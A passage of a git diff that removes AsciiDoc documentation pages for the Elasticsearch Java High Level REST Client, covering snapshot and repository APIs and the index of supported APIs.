-1,82 +0,0 @@ -[[java-rest-high-snapshot-delete-repository]] -=== Snapshot Delete Repository API - -The Snapshot Delete Repository API allows to delete a registered repository. - -[[java-rest-high-snapshot-delete-repository-request]] -==== Snapshot Delete Repository Request - -A `DeleteRepositoryRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-delete-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-delete-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a snapshot delete repository requires both the -`DeleteRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute-async] --------------------------------------------------- -<1> The `DeleteRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-delete-repository-response]] -==== Snapshot Delete Repository Response - -The returned `DeleteRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-repository-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc deleted file mode 100644 index a594db5b602..00000000000 --- a/docs/java-rest/high-level/snapshot/delete_snapshot.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[[java-rest-high-snapshot-delete-snapshot]] -=== Delete Snapshot API - -The Delete Snapshot API allows to delete a snapshot. - -[[java-rest-high-snapshot-delete-snapshot-request]] -==== Delete Snapshot Request - -A `DeleteSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-delete-snapshot-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-delete-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a delete snapshot request requires both the -`DeleteSnapshotRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute-async] --------------------------------------------------- -<1> The `DeleteSnapshotRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-delete-snapshot-response]] -==== Delete Snapshot Response - -The returned `DeleteSnapshotResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[delete-snapshot-response] --------------------------------------------------- -<1> Indicates the node has acknowledged the request diff --git a/docs/java-rest/high-level/snapshot/get_repository.asciidoc b/docs/java-rest/high-level/snapshot/get_repository.asciidoc deleted file mode 100644 index af006c66ab0..00000000000 --- a/docs/java-rest/high-level/snapshot/get_repository.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[java-rest-high-snapshot-get-repository]] -=== Snapshot Get Repository API - -The Snapshot Get Repository API allows to retrieve information about a registered repository. - -[[java-rest-high-snapshot-get-repository-request]] -==== Snapshot Get Repository Request - -A `GetRepositoriesRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-repositories] --------------------------------------------------- -<1> Sets the repositories to retrieve - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the repositories need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-get-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-get-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a snapshot get repository requires both the -`GetRepositoriesRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute-async] --------------------------------------------------- -<1> The `GetRepositoriesRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetRepositoriesResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-get-repository-response]] -==== Snapshot Get Repository Response - -The returned `GetRepositoriesResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-repository-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc b/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc deleted file mode 100644 index 1041f61d842..00000000000 --- a/docs/java-rest/high-level/snapshot/get_snapshots.asciidoc +++ /dev/null @@ -1,108 +0,0 @@ -[[java-rest-high-snapshot-get-snapshots]] -=== Get Snapshots API - -Use the Get Snapshot API to get snapshots. - -[[java-rest-high-snapshot-get-snapshots-request]] -==== Get Snapshots Request - -A `GetSnapshotsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request] --------------------------------------------------- - -==== Required Arguments -The following arguments are mandatory: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-repositoryName] --------------------------------------------------- -<1> The name of the repository. - -==== Optional Arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-snapshots] --------------------------------------------------- -<1> An array of snapshots to get. Otherwise it will return all snapshots for a repository. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. -<2> Timeout to connect to the master node as a `String`. - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-verbose] --------------------------------------------------- -<1> `Boolean` indicating if the response should be verbose. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-request-ignore-unavailable] --------------------------------------------------- -<1> `Boolean` indicating if unavailable snapshots should be ignored. Otherwise the request will -fail if any of the snapshots are unavailable. - -[[java-rest-high-snapshot-get-snapshots-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-get-snapshots-async]] -==== Asynchronous Execution - -The asynchronous execution of a get snapshots request requires both the -`GetSnapshotsRequest` instance and an `ActionListener` instance to be -passed as arguments to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute-async] --------------------------------------------------- -<1> The `GetSnapshotsRequest` to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back with the `onResponse` method -if the execution is successful or the `onFailure` method if the execution -failed. - -A typical listener for `GetSnapshotsResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an -argument. - -[[java-rest-high-snapshot-get-snapshots-response]] -==== Get Snapshots Response - -The returned `GetSnapshotsResponse` allows the retrieval of information about the requested -snapshots: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[get-snapshots-response] --------------------------------------------------- -<1> The REST status of a snapshot -<2> The snapshot id -<3> The current state of the snapshot -<4> Information about failures that occurred during the shard snapshot process. -<5> The snapshot start time -<6> The snapshot end time \ No newline at end of file diff --git a/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc b/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc deleted file mode 100644 index a4b83ca419a..00000000000 --- a/docs/java-rest/high-level/snapshot/restore_snapshot.asciidoc +++ /dev/null @@ -1,144 +0,0 @@ -[[java-rest-high-snapshot-restore-snapshot]] -=== Restore Snapshot API - -The Restore Snapshot API allows to restore a snapshot. - -[[java-rest-high-snapshot-restore-snapshot-request]] -==== Restore Snapshot Request - -A `RestoreSnapshotRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request] --------------------------------------------------- - -==== Limiting Indices to Restore - -By default all indices are restored. With the `indices` property you can -provide a list of indices that should be restored: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-indices] --------------------------------------------------- -<1> Request that Elasticsearch only restores "test_index". - -==== Renaming Indices - -You can rename indices using regular expressions when restoring a snapshot: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-rename] --------------------------------------------------- -<1> A regular expression matching the indices that should be renamed. -<2> A replacement pattern that references the group from the regular - expression as `$1`. "test_index" from the snapshot is restored as - "restored_index" in this example. - -==== Index Settings and Options - -You can also customize index settings and options when restoring: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-index-settings] --------------------------------------------------- -<1> Use `#indexSettings()` to set any specific index setting for the indices - that are restored. -<2> Use `#ignoreIndexSettings()` to provide index settings that should be - ignored from the original indices. -<3> Set `IndicesOptions.Option.IGNORE_UNAVAILABLE` in `#indicesOptions()` to - have the restore succeed even if indices are missing in the snapshot. - -==== Further Arguments - -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-waitForCompletion] --------------------------------------------------- -<1> Boolean indicating whether to wait until the snapshot has been restored. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-partial] --------------------------------------------------- -<1> Boolean indicating whether the entire snapshot should succeed although one - or more indices participating in the snapshot don’t have all primary - shards available. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-include-global-state] --------------------------------------------------- -<1> Boolean indicating whether restored templates that don’t currently exist - in the cluster are added and existing templates with the same name are - replaced by the restored templates. The restored persistent settings are - added to the existing persistent settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-request-include-aliases] --------------------------------------------------- -<1> Boolean to control whether aliases should be restored. Set to `false` to - prevent aliases from being restored together with associated indices. - -[[java-rest-high-snapshot-restore-snapshot-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-restore-snapshot-async]] -==== Asynchronous Execution - -The asynchronous execution of a restore snapshot request requires both the -`RestoreSnapshotRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute-async] --------------------------------------------------- -<1> The `RestoreSnapshotRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `RestoreSnapshotResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is - provided as an argument. -<2> Called in case of a failure. The raised exception is provided as an argument. - -[[java-rest-high-cluster-restore-snapshot-response]] -==== Restore Snapshot Response - -The returned `RestoreSnapshotResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[restore-snapshot-response] --------------------------------------------------- -<1> The `RestoreInfo` contains details about the restored snapshot like the indices or - the number of successfully restored and failed shards. diff --git a/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc b/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc deleted file mode 100644 index 8f91d774f4e..00000000000 --- a/docs/java-rest/high-level/snapshot/snapshots_status.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ -[[java-rest-high-snapshot-snapshots-status]] -=== Snapshots Status API - -The Snapshots Status API allows to retrieve detailed information about snapshots in progress. - -[[java-rest-high-snapshot-snapshots-status-request]] -==== Snapshots Status Request - -A `SnapshotsStatusRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request] --------------------------------------------------- - -==== Required Arguments -The following arguments must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-repository] --------------------------------------------------- -<1> Sets the repository to check for snapshot statuses - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-snapshots] --------------------------------------------------- -<1> The list of snapshot names to check the status of - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-ignoreUnavailable] --------------------------------------------------- -<1> The command will fail if some of the snapshots are unavailable. The `ignore_unavailable` flag -set to true will return all snapshots that are currently available. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-snapshots-status-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-snapshots-status-async]] -==== Asynchronous Execution - -The asynchronous execution of retrieving snapshot statuses requires both the -`SnapshotsStatusRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute-async] --------------------------------------------------- -<1> The `SnapshotsStatusRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `SnapshotsStatusResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-snapshot-snapshots-status-response]] -==== Snapshots Status Response - -The returned `SnapshotsStatusResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[snapshots-status-response] --------------------------------------------------- -<1> Request contains a list of snapshot statuses -<2> Each status contains information about the snapshot -<3> Example of reading snapshot statistics about a specific index and shard diff --git a/docs/java-rest/high-level/snapshot/verify_repository.asciidoc b/docs/java-rest/high-level/snapshot/verify_repository.asciidoc deleted file mode 100644 index 4f03d1e5fe3..00000000000 --- a/docs/java-rest/high-level/snapshot/verify_repository.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[java-rest-high-snapshot-verify-repository]] -=== Snapshot Verify Repository API - -The Snapshot Verify Repository API allows to verify a registered repository. - -[[java-rest-high-snapshot-verify-repository-request]] -==== Snapshot Verify Repository Request - -A `VerifyRepositoryRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-request] --------------------------------------------------- - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[create-repository-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the settings were applied -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -[[java-rest-high-snapshot-verify-repository-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute] --------------------------------------------------- - -[[java-rest-high-snapshot-verify-repository-async]] -==== Asynchronous Execution - -The asynchronous execution of a snapshot verify repository requires both the -`VerifyRepositoryRequest` instance and an `ActionListener` instance to be -passed to the asynchronous method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute-async] --------------------------------------------------- -<1> The `VerifyRepositoryRequest` to execute and the `ActionListener` -to use when the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `VerifyRepositoryResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of a failure. The raised exception is provided as an argument - -[[java-rest-high-cluster-verify-repository-response]] -==== Snapshot Verify Repository Response - -The returned `VerifyRepositoryResponse` allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnapshotClientDocumentationIT.java[verify-repository-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/supported-apis.asciidoc b/docs/java-rest/high-level/supported-apis.asciidoc deleted file mode 100644 index 594198a51a5..00000000000 --- a/docs/java-rest/high-level/supported-apis.asciidoc +++ /dev/null @@ -1,723 +0,0 @@ -[[java-rest-high-supported-apis]] - -== Document APIs - -:upid: {mainid}-document -:doc-tests-file: {doc-tests}/CRUDDocumentationIT.java - -The Java High Level REST Client supports the following Document APIs: - -[[single-doc]] -Single document APIs:: -* <<{upid}-index>> -* <<{upid}-get>> -* <<{upid}-get-source>> -* <<{upid}-exists>> -* <<{upid}-delete>> -* <<{upid}-update>> -* <<{upid}-term-vectors>> - -[[multi-doc]] -Multi-document APIs:: -* <<{upid}-bulk>> -* <<{upid}-multi-get>> -* <<{upid}-reindex>> -* <<{upid}-update-by-query>> -* <<{upid}-delete-by-query>> -* <<{upid}-rethrottle>> -* <<{upid}-multi-term-vectors>> - -include::document/index.asciidoc[] -include::document/get.asciidoc[] -include::document/get-source.asciidoc[] -include::document/exists.asciidoc[] -include::document/delete.asciidoc[] -include::document/update.asciidoc[] -include::document/term-vectors.asciidoc[] -include::document/bulk.asciidoc[] -include::document/multi-get.asciidoc[] -include::document/reindex.asciidoc[] -include::document/update-by-query.asciidoc[] -include::document/delete-by-query.asciidoc[] -include::document/rethrottle.asciidoc[] -include::document/multi-term-vectors.asciidoc[] - - -== Search APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/SearchDocumentationIT.java - -The Java High Level REST Client supports the following Search APIs: - -* <<{upid}-search>> -* <<{upid}-search-scroll>> -* <<{upid}-clear-scroll>> -* <<{upid}-search-template>> -* <<{upid}-multi-search-template>> -* <<{upid}-multi-search>> -* <<{upid}-field-caps>> -* <<{upid}-rank-eval>> -* <<{upid}-explain>> -* <<{upid}-count>> - -include::search/search.asciidoc[] -include::search/scroll.asciidoc[] -include::search/multi-search.asciidoc[] -include::search/search-template.asciidoc[] -include::search/multi-search-template.asciidoc[] -include::search/field-caps.asciidoc[] -include::search/rank-eval.asciidoc[] -include::search/explain.asciidoc[] -include::search/count.asciidoc[] - -[role="xpack"] -== Async Search APIs - -:upid: {mainid}-asyncsearch -:doc-tests-file: {doc-tests}/AsyncSearchDocumentationIT.java - -The Java High Level REST Client supports the following Async Search APIs: - -* <<{upid}-asyncsearch-submit>> -* <<{upid}-asyncsearch-get>> -* <<{upid}-asyncsearch-delete>> - -include::asyncsearch/submit.asciidoc[] -include::asyncsearch/get.asciidoc[] -include::asyncsearch/delete.asciidoc[] - -== Miscellaneous APIs - -The Java High Level REST Client supports the following Miscellaneous APIs: - -* <> -* <> -* <> -* <> - -include::miscellaneous/main.asciidoc[] -include::miscellaneous/ping.asciidoc[] -include::miscellaneous/x-pack-info.asciidoc[] -include::miscellaneous/x-pack-usage.asciidoc[] - -== Index APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/IndicesClientDocumentationIT.java - -The Java High Level REST Client supports the following Index APIs: - -Index Management:: -* <<{upid}-analyze>> -* <<{upid}-create-index>> -* <<{upid}-delete-index>> -* <<{upid}-indices-exists>> -* <<{upid}-open-index>> -* <<{upid}-close-index>> -* <<{upid}-shrink-index>> -* <<{upid}-split-index>> -* <<{upid}-clone-index>> -* <<{upid}-refresh>> -* <<{upid}-flush>> -* <<{upid}-flush-synced>> -* <<{upid}-clear-cache>> -* <<{upid}-force-merge>> -* <<{upid}-rollover-index>> -* <<{upid}-indices-put-settings>> -* <<{upid}-get-settings>> -* <<{upid}-indices-validate-query>> -* <<{upid}-get-index>> - -Mapping Management:: -* <<{upid}-put-mapping>> -* <<{upid}-get-mappings>> -* <<{upid}-get-field-mappings>> - -Alias Management:: -* <<{upid}-update-aliases>> -* <<{upid}-exists-alias>> -* <<{upid}-get-alias>> -* <<{upid}-delete-alias>> - -Template Management:: -* <<{upid}-get-templates>> -* <<{upid}-templates-exist>> -* <<{upid}-put-template>> - -include::indices/analyze.asciidoc[] -include::indices/create_index.asciidoc[] -include::indices/delete_index.asciidoc[] -include::indices/indices_exists.asciidoc[] -include::indices/open_index.asciidoc[] -include::indices/close_index.asciidoc[] -include::indices/shrink_index.asciidoc[] -include::indices/split_index.asciidoc[] -include::indices/clone_index.asciidoc[] -include::indices/refresh.asciidoc[] -include::indices/flush.asciidoc[] -include::indices/flush_synced.asciidoc[] -include::indices/clear_cache.asciidoc[] -include::indices/force_merge.asciidoc[] -include::indices/rollover.asciidoc[] -include::indices/put_mapping.asciidoc[] -include::indices/get_mappings.asciidoc[] -include::indices/get_field_mappings.asciidoc[] -include::indices/update_aliases.asciidoc[] -include::indices/delete_alias.asciidoc[] -include::indices/exists_alias.asciidoc[] -include::indices/get_alias.asciidoc[] -include::indices/put_settings.asciidoc[] -include::indices/get_settings.asciidoc[] -include::indices/put_template.asciidoc[] -include::indices/validate_query.asciidoc[] -include::indices/get_templates.asciidoc[] -include::indices/templates_exist.asciidoc[] -include::indices/get_index.asciidoc[] -include::indices/freeze_index.asciidoc[] -include::indices/unfreeze_index.asciidoc[] -include::indices/delete_template.asciidoc[] -include::indices/reload_analyzers.asciidoc[] -include::indices/get_index_template.asciidoc[] -include::indices/put_index_template.asciidoc[] -include::indices/delete_index_template.asciidoc[] -include::indices/simulate_index_template.asciidoc[] - -== Cluster APIs - -The Java High Level REST Client supports the following Cluster APIs: - -* <> -* <> -* <> -* <> - -:upid: {mainid}-cluster -:doc-tests-file: {doc-tests}/ClusterClientDocumentationIT.java -include::cluster/put_settings.asciidoc[] -include::cluster/get_settings.asciidoc[] -include::cluster/health.asciidoc[] -include::cluster/remote_info.asciidoc[] -include::cluster/get_component_template.asciidoc[] -include::cluster/put_component_template.asciidoc[] -include::cluster/delete_component_template.asciidoc[] - -== Ingest APIs -The Java High Level REST Client supports the following Ingest APIs: - -* <> -* <> -* <> -* <> - -include::ingest/put_pipeline.asciidoc[] -include::ingest/get_pipeline.asciidoc[] -include::ingest/delete_pipeline.asciidoc[] -include::ingest/simulate_pipeline.asciidoc[] - -== Snapshot APIs - -The Java High Level REST Client supports the following Snapshot APIs: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -include::snapshot/get_repository.asciidoc[] -include::snapshot/create_repository.asciidoc[] -include::snapshot/delete_repository.asciidoc[] -include::snapshot/verify_repository.asciidoc[] -include::snapshot/create_snapshot.asciidoc[] -include::snapshot/get_snapshots.asciidoc[] -include::snapshot/snapshots_status.asciidoc[] -include::snapshot/delete_snapshot.asciidoc[] -include::snapshot/restore_snapshot.asciidoc[] - -== Tasks APIs - -The Java High Level REST Client supports the following Tasks APIs: - -* <> -* <> - -include::tasks/list_tasks.asciidoc[] -include::tasks/cancel_tasks.asciidoc[] - -== Script APIs - -The Java High Level REST Client supports the following Scripts APIs: - -* <> -* <> -* <> - -include::script/get_script.asciidoc[] -include::script/put_script.asciidoc[] -include::script/delete_script.asciidoc[] - -== Licensing APIs - -The Java High Level REST Client supports the following Licensing 